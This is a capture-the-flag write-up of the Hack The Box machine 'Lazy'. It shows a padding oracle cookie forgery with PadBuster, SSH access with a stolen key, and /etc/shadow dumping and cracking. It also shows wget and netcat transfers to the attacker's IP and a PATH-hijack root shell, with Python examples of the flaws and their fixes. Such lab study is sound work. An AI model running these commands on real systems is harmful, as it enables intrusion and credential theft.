Hackthebox.eu - Retired - Lazy
Recon
As always I start with a simple up/down scan on all TCP ports
$ nmap -T4 -p- -oX ./nmapb.xml lazy.htb
Then I convert that to HTML to make it pretty
$ xsltproc ./nmapb.xml -o nmapb.html
Just two ports open: 22 and 80
Let's run nmap again with -A to run all the things
$ nmap -T4 -A -p22,80 -oX ./nmapf.xml lazy.htb
And let's convert that to HTML too
$ xsltproc ./nmapf.xml -o ./nmapf.html
Looks like OpenSSH 6.6.1p1
And Apache 2.4.7
That is a super old version of OpenSSH.
Let's check the website
Tried logging in as admin/admin
No dice
But it did let me register a user
Homerj
Password
Got an auth cookie
Check this out: if we try to register the same name again…
We could theoretically use this to find out some usernames on the system. I tried doing a hydra attack at it but I couldn't get the syntax right for what I wanted it to do… But I did add several hundred new users to the system :)
Exploit
After a reset, I decided to take a harder look at the cookie we got earlier.
We caught the login in Burp
We can see the cookie 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat
And we see in the response that we are logged in as the user we created, homerj
I want to test if this might be susceptible to a padding oracle attack
If we change the cookie value and get an error back about the padding being incorrect, we can use that information leak to decrypt the value and then encrypt something else in its place
I just added Simpson to the end of my cookie value
And we did get an invalid padding error message back, so hopefully we can use a tool called PadBuster to decrypt this
You can clone the repo from here: https://github.com/AonCyberLabs/PadBuster
And this blog walks you through the nuts and bolts of exactly how this attack works and gives some examples of using PadBuster to break the value.
$ ./padBuster.pl http://lazy.htb/login.php 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat 8 -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat -encoding 0
So here we are giving it:
the URL to test for valid padding against, http://lazy.htb/login.php
the sample encrypted value, 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat
then the block size the cipher is using. I'm just guessing 8; it could be 16 if this doesn't work
then the cookie's value, -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat
and lastly another guess: the encoding used. Here are our options with PadBuster:
- 0: Base64 (default)
- 1: Lowercase HEX ASCII
- 2: Uppercase HEX ASCII
I guessed Base64, so that is the last part: -encoding 0
Part way through the decoding we get a prompt asking which of the IDs we want to proceed with. It recommended 2, so that is what I chose
Eventually we get this back
It was able to decrypt user=homerj as ASCII using the padding oracle attack.
Guess what: if it can decrypt it, we can forge a modified value with this tool too.
Very similar command:
$ ./padBuster.pl http://lazy.htb/login.php 50xBDBlHPSA9QwFhjMtuyBF2krAvOSat 8 -cookie auth=50xBDBlHPSA9QwFhjMtuyBF2krAvOSat -encoding 0 -plaintext user=admin
We just need to add the plaintext we want the cookie to decrypt to, in this case user=admin, so placing -plaintext user=admin at the end of the previous command will do that for us
Eventually we get this back
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
I'm going to just use the cookie editor extension I have loaded in Firefox to change this value
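To make the oracle concrete, here is an added example (not the box's PHP, which we never see) modelling both sides of this cookie scheme in Python: a toy 8-byte-block cipher in CBC mode with PKCS#7 padding, a weak reader that returns a distinct error on bad padding (exactly the leak PadBuster needs), and a hardened reader that HMACs the ciphertext and rejects any tampered cookie with one uniform error before it ever decrypts. The cipher, the key names and the user= layout are assumptions.

```python
import base64, hashlib, hmac, os
BLOCK = 8  # 64-bit blocks, the block size PadBuster was given above
def _feistel(key: bytes, blk: bytes, decrypt: bool = False) -> bytes:
    # Toy 8-round Feistel cipher (SHA-256 round function): a stand-in for the box's unknown cipher, NOT for real use.
    l, r = int.from_bytes(blk[:4], "big"), int.from_bytes(blk[4:8], "big")
    if decrypt: l, r = r, l
    for i in (range(7, -1, -1) if decrypt else range(8)):
        l, r = r, l ^ int.from_bytes(hashlib.sha256(key + bytes([i]) + r.to_bytes(4, "big")).digest()[:4], "big")
    if decrypt: l, r = r, l
    return l.to_bytes(4, "big") + r.to_bytes(4, "big")

def _cbc(key: bytes, iv: bytes, data: bytes, decrypt: bool = False) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        if decrypt:
            out += bytes(x ^ y for x, y in zip(_feistel(key, blk, True), prev)); prev = blk
        else:
            prev = _feistel(key, bytes(x ^ y for x, y in zip(blk, prev))); out += prev
    return out

def _unpad(b: bytes) -> bytes:  # PKCS#7 check; raises ValueError on malformed padding
    n = b[-1] if b else 0
    if not 1 <= n <= BLOCK or b[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return b[:-n]

def _encrypt_cookie(key: bytes, user: bytes) -> bytes:  # IV || CBC(PKCS#7-pad("user=" + user))
    n = BLOCK - (5 + len(user)) % BLOCK
    iv = os.urandom(BLOCK)
    return iv + _cbc(key, iv, b"user=" + user + bytes([n]) * n)

class PaddingError(Exception): pass  # distinguishable from every other failure: the oracle
class AuthError(Exception): pass     # the single rejection the hardened reader ever gives
def issue_weak(key: bytes, user: bytes) -> str:
    return base64.b64encode(_encrypt_cookie(key, user)).decode()
def read_weak(key: bytes, cookie: str) -> bytes:
    raw = base64.b64decode(cookie)
    try: return _unpad(_cbc(key, raw[:BLOCK], raw[BLOCK:], True))
    except ValueError: raise PaddingError("invalid padding")  # tells the client the padding was wrong
def issue_hardened(enc_key: bytes, mac_key: bytes, user: bytes) -> str:
    body = _encrypt_cookie(enc_key, user)
    return base64.b64encode(body + hmac.new(mac_key, body, hashlib.sha256).digest()).decode()
def read_hardened(enc_key: bytes, mac_key: bytes, cookie: str) -> bytes:
    raw = base64.b64decode(cookie)
    body, tag = raw[:-32], raw[-32:]
    # Constant-time MAC check before any decryption; every kind of tampering gets the same error.
    if len(body) < 2 * BLOCK or not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()):
        raise AuthError("invalid session")
    return _unpad(_cbc(enc_key, body[:BLOCK], body[BLOCK:], True))
```

A client that can tell PaddingError from a success has the oracle the write-up uses; a client that only ever sees AuthError has nothing to measure.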
Old value
Here is the new value
I'll hit save and reload the page
Bingo, we got in as admin
And more importantly than that, we get their SSH key
Let's save it to our Kali box, give it tighter permissions and try to use this private key to connect over SSH
But what about a username?
Well, check out the name of the private key file:
mitsos
$ ssh -i ./privkey mitsos@lazy.htb
We got our shell!!!
Let's see where we landed…
Oh, there is the user hash
Let's get LinEnum.sh over to the box and see if we can find a path to escalation
On my Kali box I just ran SimpleHTTPServer from the /opt/linux/linenum folder
mitsos@LazyClown:/tmp$ mkdir circusmonkey ; cd circusmonkey
mitsos@LazyClown:/tmp/circusmonkey$ wget http://10.10.14.48:88/LinEnum.sh
Gave execute rights to the script
chmod +x ./LinEnum.sh
Didn't see anything that jumped out at me in the output.
Let's look back at the /home/mitsos folder
What is that file called backup?
Mmmkay, it's not a folder… but we can run it
It's an executable
Since this isn't my machine let's run it and see what it does
:)
Looks like it dumps out the shadow file.
I saved that locally in a file called lazyshadow
Let's grab the /etc/passwd file too so we can unshadow this and feed it to john
Copied that out locally to a file named lazypasswd
Then run unshadow to put the list in a format john likes
$ sudo /usr/sbin/unshadow ./lazypasswd ./lazyshadow > ./lazyunshadow
$ sudo john --wordlist=/home/circusmonkey/rockyou.txt ./lazyunshadow
I literally let this run all night and it never got the hashes…
Let's take a look at that executable.
I used netcat to copy it over locally
On my local box
$ nc -lnvp 4444 > backup
On Lazy
nc 10.10.14.48 4444 < /home/mitsos/backup
This probably wasn't necessary but I wanted to check it out offline
I used the strings command to see if there are any strings in the executable that we can read
Looks like it does exactly what we thought: it cats the /etc/shadow file.
Let's check the permissions on this file again
It's owned by root
-rwsrwsr-x
If you're not familiar with this syntax, here is a great resource
Basically this can be divided into three sections: three groups of three characters indicating who has what rights to the file
The first grouping is the rights of the owner of the file
The next grouping is for the members of the group that has permissions on the file
The final grouping is for others, meaning any user that is not the owner or a member of the group
Normally you will see either an x, r or w in the groupings, which mean:
x = execute - this user or group can execute the file
r = read - this user or group can read the file
w = write - this user or group can write to this file, to change or modify it
In our example here we see another character added to the normal options you would see. This example has an s.
s is setuid or setgid (depending on whether it's set at the owner level or the group level)
What it means to us is that if the setuid bit is set on an executable, whoever can run the program will have it run as the owner of the file when they execute it. So in this case, if anyone can run this file, it runs as root.
-rwsrwsr-x
-rws: the first dash here just indicates whether this is a directory or a link; if it were, there would be a d or an l in this place, so we will just ignore it
rws - owner can read, write and execute this file
rws - group members can read, write and execute
r-x - others can read and execute
So we are not root, so we can ignore the first three characters in the permissions
We are also not members of the group root, so we can ignore the second three characters
We are however an "other": we are a user on this system.
So we can read and execute… and since the setuid bit is present, when we run it we run it as root
Which is why when we run it, it can cat out the /etc/shadow file, which we as mitsos don't have access to.
However we can't modify the file directly, since we don't have write permissions.
Ok back to the interesting string we were able to pull from the executable
cat /etc/shadow
What we might do if we were able to manipulate the file itself is just change it to cat /root/root.txt to get our root hash.
But what we can do here is take advantage of the relative call to cat
We can simply change what cat means to the system.
If they had used /bin/cat /etc/shadow then this wouldn't work, but since we control our own environment variables we can hijack cat to be something else.
The reason we can call cat without the absolute path is that /bin is in our PATH environment variable. We can check our environment variables by typing env
This is pretty standard on all operating systems, not just Linux; Windows also has an environment variable like this so we can run programs from \system32 without having to type the absolute path.
So we can change our PATH to include a folder we own and give it a cat that does something else instead of just reading out a file.
Here is another write up on this attack method
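As an added illustration (not the box's backup binary, whose source we don't have), this Python script shows where a bare cat lands under a hijacked PATH versus a fixed one, and how a setuid helper should invoke it instead: absolute path, no shell, and an environment it controls. The temp directory, the marker script and /bin/cat as the hard-coded binary are assumptions.

```python
import os, shutil, subprocess, tempfile

# The only environment the hardened helper hands to its child: a fixed PATH, not the caller's.
SAFE_ENV = {"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"}

def resolve_like_system(cmd, path):
    # Where a bare name such as 'cat' lands when searched through 'path': the same
    # lookup sh performs for system("cat /etc/shadow"); the first match wins.
    return shutil.which(cmd, path=path)

def plant_fake_cat(dirpath):
    # Constructed stand-in for the write-up's /tmp/circusmonkey/cat; it is only
    # resolved here, never executed.
    fake = os.path.join(dirpath, "cat")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho HIJACKED\n")
    os.chmod(fake, 0o755)
    return fake

def backup_hardened(target):
    # What a setuid helper should do instead: absolute binary, argv list (no shell),
    # and an environment it controls, so PATH cannot redirect the call.
    return subprocess.run(["/bin/cat", target], env=SAFE_ENV,
                          capture_output=True, text=True, check=True).stdout

def demo():
    with tempfile.TemporaryDirectory() as d:
        fake = plant_fake_cat(d)
        target = os.path.join(d, "secret.txt")  # constructed file standing in for /etc/shadow
        with open(target, "w") as f:
            f.write("placeholder-contents\n")
        hijacked = d + ":" + SAFE_ENV["PATH"]  # effect of 'export PATH=/tmp/circusmonkey:$PATH'
        return {
            "fake_cat": fake,
            "relative_cat_under_hijacked_path": resolve_like_system("cat", hijacked),
            "relative_cat_under_fixed_path": resolve_like_system("cat", SAFE_ENV["PATH"]),
            "hardened_output": backup_hardened(target).strip(),
        }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```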
So we need to create a new cat that launches a shell as the root user
Moving back to the /tmp/circusmonkey folder we created earlier
cd /tmp/circusmonkey/
We will create a new cat file here that just launches a shell
echo "/bin/sh" > cat
Now we need to change the permissions to give it execute rights for all users
chmod 777 ./cat
Now we just need to add this /tmp/circusmonkey to the path environment variable
export PATH=/tmp/circusmonkey:$PATH
*** You can see I can't spell my own name here in this output ***
Now we just need to execute the backup executable again and hopefully it will use our newly created cat to give us a root shell
I am root
Now we just need to get our hash. Remember we messed with the PATH environment variable, so now we have to use the absolute path for cat or we will just call our shell again.
# /bin/cat /root/root.txt
990*************************